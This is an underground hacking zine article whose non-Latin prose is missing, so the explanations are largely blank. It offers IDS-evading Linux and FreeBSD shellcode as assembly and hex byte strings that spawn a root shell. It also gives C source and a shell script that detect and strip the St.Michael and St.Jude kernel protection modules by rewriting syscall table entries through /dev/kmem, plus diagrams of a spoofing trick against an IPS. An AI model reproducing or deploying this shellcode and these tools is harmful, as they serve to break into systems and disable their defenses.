..-----------------------------..
..       IDS  warez  bugz      ..
.._____________________________..


  C0nt3nt

   0x01    bypassing shellcodez detection
   0x02    lkm protection t00lz 0wnage (st.michael & st.jude)
   0x03    have fun with port-scanning detectorz / snifferz


 --[1]--  bypassing shellcodez detection


   ,  ,    RST    ids  
    .    -    ICWiener'   
   code_pimps     -   - 
     )),         . 
            0x90   \xcd\x80 (
   , ,     ).


   ,       -  
        .   %eax:

          incl %eax   // opcode 0x40
          decl %eax   // opcode 0x48
          ...
          xorl %eax,%eax
          bla-bla-bla

      -   ,      
   %eax.   ,   32-     ,   
        .      ,
            .    
         ebx,ecx,edx:

          incl %ebx   // opcode 0x43
          decl %ebx   // opcode 0x4b
          incl %ecx   // opcode 0x41
          decl %ecx   // opcode 0x49
          incl %edx   // opcode 0x42
          decl %edx   // opcode 0x4a


       -   80h.      ""
    :   0x80cd ( byte order,  x86   
   little endian)     .      , 
       call. ,    linux/x86:

   ##     :
    #
    #   clc
    #   int $0x80
    #   ret
   ##

     pushw $0xc380
     pushw $0xcdf8
     movl %esp, %eax
     pushl %eax
     movl %esp, %esi  #  %esi    

   ##  chroot()  ##
     xorl %eax,%eax
     push %eax
     pushw $0x2f2f
     movl %esp,%ebx
     mov $61, %al
     call *(%esi)     #     

   ##  setuid()  ##
     xorl %eax,%eax
     xorl %ebx,%ebx
     mov $23, %al
     call *(%esi)

   ##  execve()  ##
     xorl %eax,%eax
     xorl %edx,%edx
     push %eax
     pushl $0x68732f6e
     pushl $0x69622f2f
     movl %esp, %ebx
     pushl %edx
     pushl %ebx
     movl %esp,%ecx
     movb $11,%al
     call *(%esi)


         ascii:

  /* Linux/x86 shellcode */
  /* init int_0x80 code in stack and pointer */

   "\x66\x68\x80\xc3"      //  	pushw  $0xc380
   "\x66\x68\x90\xcd"      //  	pushw  $0xcd90
   "\x89\xe0"              //  	movl   %esp,%eax
   "\x50"                  //  	push   %eax
   "\x89\xe6"              //  	movl   %esp,%esi

  /* chroot() */

   "\x31\xc0"              //  	xorl   %eax,%eax
   "\x50"                  //  	push   %eax
   "\x66\x68\x2f\x2f"      //  	pushw  $0x2f2f
   "\x89\xe3"              //  	movl   %esp,%ebx
   "\xb0\x3d"              //  	mov    $0x3d,%al
   "\xff\x16"              //  	call   *(%esi)

  /* setuid() */

   "\x31\xc0"              //  	xorl   %eax,%eax
   "\x31\xdb"              //  	xorl   %ebx,%ebx
   "\xb0\x17"              //  	mov    $0x17,%al
   "\xff\x16"              //  	call   *(%esi)

  /* execve() */

   "\x31\xc0"              //  	xorl   %eax,%eax
   "\x31\xd2"              //  	xorl   %edx,%edx
   "\x50"                  //  	push   %eax
   "\x68\x6e\x2f\x73\x68"  //  	push   $0x68732f6e
   "\x68\x2f\x2f\x62\x69"  //  	push   $0x69622f2f
   "\x89\xe3"              //  	movl   %esp,%ebx
   "\x52"                  //  	push   %edx
   "\x53"                  //  	push   %ebx
   "\x89\xe1"              //  	movl   %esp,%ecx
   "\xb0\x0b"              //  	mov    $0xb,%al
   "\xff\x16"              //  	call   *(%esi)

  /* total 59 bytes */


    BSD-  :

   ##  init int_80h code in stack
     pushw $0xc380
     pushw $0xcdf8
     movl %esp,%eax
     pushl %eax
     movl %esp,%edx  #   pointer  %edx
                     # (..        
                     #  %ebx, %ecx, %edx)

   ##  setuid()  ##
     xorl %eax,%eax
     pushl %eax
     pushl $23
     call *(%edx)  #     ( ,    
                   # %esi    freebsd    )

   ##  execve()  ##
     xor %eax,%eax
     pushl %eax
     pushl $0x68732f6e
     pushl $0x69622f2f
     movl %esp,%ebx
     pushl %eax
     pushl %ebx
     movl %esp,%ecx
     pushl %eax
     pushl %ecx
     pushl %ebx
     pushl $59
     call *(%edx)


   , ,    ascii:

  /* FreeBSD/x86 shellcode */
  /* init int_0x80 code in stack and pointer */

   "\x66\x68\x80\xc3"      // pushw  $0xc380
   "\x66\x68\xf8\xcd"      // pushw  $0xcdf8
   "\x89\xe0"              // movl   %esp,%eax
   "\x50"                  // pushl  %eax
   "\x89\xe2"              //	movl   %esp,%edx

  /* setuid() */

   "\x31\xc0"              // xorl   %eax,%eax
   "\x50"                  // pushl  %eax
   "\x6a\x17"              // pushl  $0x17
   "\xff\x12"              //	call   *(%edx)

  /* execve() */

   "\x31\xc0"              // xorl   %eax,%eax
   "\x50"                  // pushl  %eax
   "\x68\x6e\x2f\x73\x68"  //	pushl  $0x68732f6e
   "\x68\x2f\x2f\x62\x69"  //	pushl  $0x69622f2f
   "\x89\xe3"              // movl   %esp,%ebx
   "\x50"                  // pushl  %eax
   "\x53"                  // pushl  %ebx
   "\x89\xe1"              // movl   %esp,%ecx
   "\x50"                  // pushl  %eax
   "\x51"                  // pushl  %ecx
   "\x53"                  // pushl  %ebx
   "\x6a\x3b"              // pushl  $0x3b
   "\xff\x12"              //	call   *(%edx)

  /* total 46 bytes */




 --[2]--  lkm protection t00lz 0wnage (st.michael & st.jude)


        ,   lkm-.   
              -  St.Michael,
          sys_call_table,   St.Jude,
            .    
   ,   Timothy Lalwess'a    )


    ,       ,       
     .   ,    :

   /*  StMichael_lkm.c */

     (void *) orig_init_module = sys_call_table[__NR_init_module];
     (void *) orig_delete_module = sys_call_table[__NR_delete_module];
     (void *) orig_exit = sys_call_table[__NR_exit];
     (void *) orig_create_module = sys_call_table[__NR_create_module];

 #if defined(FSCHECK) || defined(ROKMEM) || defined(REALLY_IMMUTABLE)
     (void *) sm_open = sys_call_table[__NR_open];
     (void *) sm_close = sys_call_table[__NR_close];
 #endif

     (void *) syscall_reboot = sys_call_table[__NR_reboot];
     (void *) syscall_sync = sys_call_table[__NR_sync];

     sys_call_table[__NR_init_module] = (void *) sm_init_module;
     sys_call_table[__NR_delete_module] = (void *) sm_delete_module;
     sys_call_table[__NR_create_module] = (void *) sm_create_module;
     sys_call_table[__NR_exit] = (void *) sm_exit;


        ,      
      lkm.    /dev/kmem   :   
          , ..    
        /dev/kmem,    -    ,  
     .  St.Jude, ,      St.Michael   
    init_module/etc        :

 /*
    fuck_stz.c

     St.Michael or St.Jude detector

     (c) russian underground community
 */

 #include <stdio.h>
 #include <fcntl.h>
 #include <sys/types.h>
 #include <sys/stat.h>
 #include <asm/unistd.h>

 unsigned long ma_atol(char *p)
 {
   int i;
   unsigned long tmp,fs,res=0;
   char v[8];

   memcpy(&v,p,8);
   fs = 65536 * 256;
 
   for(i=0; i<8; i+=2){

     if (v[i] == 0x30) tmp = 0;
     if (v[i] == 0x31) tmp = 16;
     if (v[i] == 0x32) tmp = 32;
     if (v[i] == 0x33) tmp = 48;
     if (v[i] == 0x34) tmp = 64;
     if (v[i] == 0x35) tmp = 80;
     if (v[i] == 0x36) tmp = 96;
     if (v[i] == 0x37) tmp = 112;
     if (v[i] == 0x38) tmp = 128;
     if (v[i] == 0x39) tmp = 144;
     if (v[i] == 0x61) tmp = 160;
     if (v[i] == 0x62) tmp = 176;
     if (v[i] == 0x63) tmp = 192;
     if (v[i] == 0x64) tmp = 208;
     if (v[i] == 0x65) tmp = 224;
     if (v[i] == 0x66) tmp = 240;

     if (v[i+1] == 0x31) tmp += 1;
     if (v[i+1] == 0x32) tmp += 2;
     if (v[i+1] == 0x33) tmp += 3;
     if (v[i+1] == 0x34) tmp += 4;
     if (v[i+1] == 0x35) tmp += 5;
     if (v[i+1] == 0x36) tmp += 6;
     if (v[i+1] == 0x37) tmp += 7;
     if (v[i+1] == 0x38) tmp += 8;
     if (v[i+1] == 0x39) tmp += 9;
     if (v[i+1] == 0x61) tmp += 10;
     if (v[i+1] == 0x62) tmp += 11;
     if (v[i+1] == 0x63) tmp += 12;
     if (v[i+1] == 0x64) tmp += 13;
     if (v[i+1] == 0x65) tmp += 14;
     if (v[i+1] == 0x66) tmp += 15;
   
     res += tmp * fs;
     fs /= 256;
   }

   return res;
 }


 int main( int argc, char *argv[])
 {
   int fd,kmem, syscall;
   long addr1, addr2, sct;
   char rec[9]; // conf file record line

   if (argc < 2){
     printf("Usage: %s sys_call_num \n",argv[0]);
     exit(1);
   }

   syscall = atoi(argv[1]);

   fd = open("/tmp/conf",O_RDONLY);

   if (fd < 0){
     printf("[-] cant open /tmp/conf!\n");
     exit(1)'
   }

   chdir("/dev");
   kmem = open("./kmem", O_RDONLY);

   if (kmem < 0){
     printf("[-] cant read /dev/kmem! Maybe St.Michael/Jude blocks j00?\n");
     close(fd);
     exit(1);
   }

   read(fd, &rec, 9);
   sct = ma_atol((char *)&rec);
   printf("get addr of sys_call_table %x\n",sct);

   read(fd, &rec, 9);
   addr1 = ma_atol((char *)&rec);

   lseek(kmem, sct + syscall*4, SEEK_SET);
   read(kmem, &addr2, 4);

   if (addr1 != addr2) printf("St.Michael or St.Jude in system!\n");
   else printf("Everythin' is ok!\n");

   close(kmem);
   close(fd);
   exit(0);
 }


       :

    satanix~># pwd
    /tmp

    satanix~># cat /boot/System.map | grep -a " sys_call"
    c0227240 D sys_call_table

    satanix~># echo c0227240 > ./conf
    satanix~># cat /boot/System.map | grep -a "T init_modules"
    c0244420 T init_modules

    satanix~># echo c0244420 >> ./conf
    satanix~># gcc -o fuckem fuck_stz.c
    satanix~># cat /usr/include/asm/unistd.h | grep init_mod
    #define __NR_init_module	128

    satanix~># ./fuckem 128
    St.Michael or St.Jude in system!

    satanix~>#

       )) ,  ,    
     st- :     sys_call_table,  
     -    ,            
   System.map.    :


 /*
               !!! St.Michael / St.Jude remover !!!

  St.Michael wraps this syscalls:

   init_module
   delete_module
   create_module
   exit

  St.Jude aslo wraps this:

   init_module
   delete_module
   create_module
   exit

   fork
   vfork
   clone
   setuid
   setreuid
   execve


   (c) russian underground community
 */

 #include <stdio.h>
 #include <unistd.h>
 #include <fcntl.h>
 #include <sys/types.h>
 #include <sys/stat.h>
 #include <asm/unistd.h>

 #include "ma_atol.h"


 int main( int argc, char *argv[])
 {
   int i, fd, kmem, syscall;
   unsigned int dumb;
   unsigned long orig, cur, sct;
   char rec[9]; // conf file record line

   if (argc < 2){
     printf("Usage: %s type \n types: \n  1\t\t St.Michael\n  2\t\t St.Jude\n",
       argv[0]);
     exit(1);
   }

   dumb = atoi(argv[1]);

   if (dumb != 1 && dumb != 2){
     printf("bad mode\n");
     exit(1);
   }

   fd = open("/tmp/conf",O_RDONLY);

   if (fd < 0){
  
     printf("cant open /tmp/conf!\n");
     exit(1);
    
   }

   chdir("/dev");

   kmem = open("./kmem", O_RDWR);

   if (kmem < 0){
     printf("[-] can't access to /dev/kmem! Some asshole blocks you\n");
     close(fd);
     exit(1);
   }

   read(fd, &rec, 9);
   sct = ma_atol((char *)&rec);
   printf("get addr of sys_call_table %x\n",sct);


 /* check init_module() */
   read(fd, &rec, 9);
   orig = ma_atol((char *)&rec);

   lseek(kmem, sct + __NR_init_module*4, SEEK_SET);
   read(kmem, &cur, 4);
 
   if (orig != cur){

     lseek(kmem, sct + __NR_init_module*4, SEEK_SET);
     write(kmem, &orig, 4);
     printf("[+] init_module() addr fixed succesfully (%x from %x)!\n",orig,cur);

   }



 /* check delete_module() */
   read(fd, &rec, 9);
   orig = ma_atol((char *)&rec);

   lseek(kmem, sct + __NR_delete_module*4, SEEK_SET);
   read(kmem, &cur, 4);

   if (orig != cur){

     lseek(kmem, sct + __NR_delete_module*4, SEEK_SET);
     write(kmem, &orig, 4);
     printf("[+] delete_module() addr fixed succesfully (%x from %x)!\n",orig,cur);

   }


 /* check create_module() */
   read(fd, &rec, 9);
   orig = ma_atol((char *)&rec);

   lseek(kmem, sct + __NR_create_module*4, SEEK_SET);
   read(kmem, &cur, 4);

   if (orig != cur){

     lseek(kmem, sct + __NR_create_module*4, SEEK_SET);
     write(kmem, &orig, 4);
     printf("[+] create_module() addr fixed succesfully (%x from %x)!\n",orig,cur);

   }


 /* check sys_exit() */
   read(fd, &rec, 9);
   orig = ma_atol((char *)&rec);

   lseek(kmem, sct + __NR_exit*4, SEEK_SET);
   read(kmem, &cur, 4);

   if (orig != cur){

     lseek(kmem, sct + __NR_exit*4, SEEK_SET);
     write(kmem, &orig, 4);
     printf("[+] sys_exit() addr fixed succesfully (%x from %x)!\n",orig,cur);

   }

   if (dumb == 1){

     printf("done!\n");
     close(kmem);
     close(fd);
     exit(0);

   }

 /* now let'z kick St.Jude's ass!! */

 /* check fork */
   read(fd, &rec, 9);
   orig = ma_atol((char *)&rec);

   lseek(kmem, sct + __NR_fork*4, SEEK_SET);
   read(kmem, &cur, 4);

   if (orig != cur){

     lseek(kmem, sct + __NR_fork*4, SEEK_SET);
     write(kmem, &orig, 4);
     printf("[+] fork() addr fixed succesfully (%x from %x)!\n",orig,cur);

   }


 /* check vfork */
   read(fd, &rec, 9);
   orig = ma_atol((char *)&rec);

   lseek(kmem, sct + __NR_vfork*4, SEEK_SET);
   read(kmem, &cur, 4);

   if (orig != cur){

     lseek(kmem, sct + __NR_vfork*4, SEEK_SET);
     write(kmem, &orig, 4);
     printf("[+] vfork() addr fixed succesfully (%x from %x)!\n",orig,cur);

   }


 /* check clone */
   read(fd, &rec, 9);
   orig = ma_atol((char *)&rec);

   lseek(kmem, sct + __NR_clone*4, SEEK_SET);
   read(kmem, &cur, 4);

   if (orig != cur){

     lseek(kmem, sct + __NR_clone*4, SEEK_SET);
     write(kmem, &orig, 4);
     printf("[+] clone() addr fixed succesfully (%x from %x)!\n",orig,cur);

   }



 /* check setuid */
   read(fd, &rec, 9);
   orig = ma_atol((char *)&rec);

   lseek(kmem, sct + __NR_setuid*4, SEEK_SET);
   read(kmem, &cur, 4);

   if (orig != cur){

     lseek(kmem, sct + __NR_setuid*4, SEEK_SET);
     write(kmem, &orig, 4);
     printf("[+] setuid() addr fixed succesfully (%x from %x)!\n",orig,cur);

   }


 /* check setreuid */
   read(fd, &rec, 9);
   orig = ma_atol((char *)&rec);

   lseek(kmem, sct + __NR_setreuid*4, SEEK_SET);
   read(kmem, &cur, 4);

   if (orig != cur){

     lseek(kmem, sct + __NR_setreuid*4, SEEK_SET);
     write(kmem, &orig, 4);
     printf("[+] setreuid() addr fixed succesfully (%x from %x)!\n",orig,cur);

   }


 /* check execve */
   read(fd, &rec, 9);
   orig = ma_atol((char *)&rec);

   lseek(kmem, sct + __NR_execve*4, SEEK_SET);
   read(kmem, &cur, 4);

   if (orig != cur){

     lseek(kmem, sct + __NR_execve*4, SEEK_SET);
     write(kmem, &orig, 4);
     printf("[+] execve() addr fixed succesfully (%x from %x)!\n",orig,cur);

   }

   printf("well done!\n");

   close(kmem);
   close(fd);
   exit(0);
 }


       :

 #!/bin/sh

 cd /boot/
 cat System.map | grep -a "D sys_call" >/tmp/conf.0
 cat System.map | grep sys_init >>/tmp/conf.0
 cat System.map | grep sys_delete >>/tmp/conf.0
 cat System.map | grep sys_create >>/tmp/conf.0
 cat System.map | grep -a "T sys_exit" >>/tmp/conf.0

 cat System.map | grep sys_fork >>/tmp/conf.0
 cat System.map | grep sys_vfork >>/tmp/conf.0
 cat System.map | grep sys_clone >>/tmp/conf.0

 cat System.map | grep sys_setuid | head -1 >>/tmp/conf.0
                    # mb u need setuid16 !! Just change 'head -1' to 'tail -1'
 cat System.map | grep sys_setreuid | head -1 >>/tmp/conf.0
                    # mb u need setreuid16 here!! change 'head -1' to 'tail -1'

 cat System.map | grep sys_execve >>/tmp/conf.0

 cd /tmp/
 cat conf.0 | awk -F " " '{print $1}' >>conf
 echo "config generation done!"
 # _eof_

    ,    St.Jude   ,     
           .   
    ,  - .   ,     
      ;P    ?




 --[3]--  have fun with port-scanning detectorz / snifferz


            .  
         ,     
    -  (     -   )).     
    ?


   1.     - IPS  (Intrusion  Prevention System),
      ,   ,       ,
       ,    ,     ascii-
   .              
      IPS  - .


   2.    -   IPS   
     .     ?  
      ))         
     , ..    (    
          ),       
      =)


     phase 1.
                         6.6.6.13
                      host X  (attacker)
                  .//'
                 .//'
                .//'    c  B
               .//'
               1/
          host A                                host B
        (here IPS)                       (old rsh-server, trusted host 13.6.6.6)
         13.6.6.6                               13.0.0.7


     phase 2.

                       6.6.6.13
                     host X (attacker)
                                    '\\.
                                     '\\.  start spoofing
                                      '\\.
                                       '\\.       ( src_ip: 13.6.6.6 )
                                         \1
          host A      reply packets     host B
        (here IPS)  <============== (old rsh-server)
         13.6.6.6                       13.0.0.7

     
         
       .


.e.o.f.

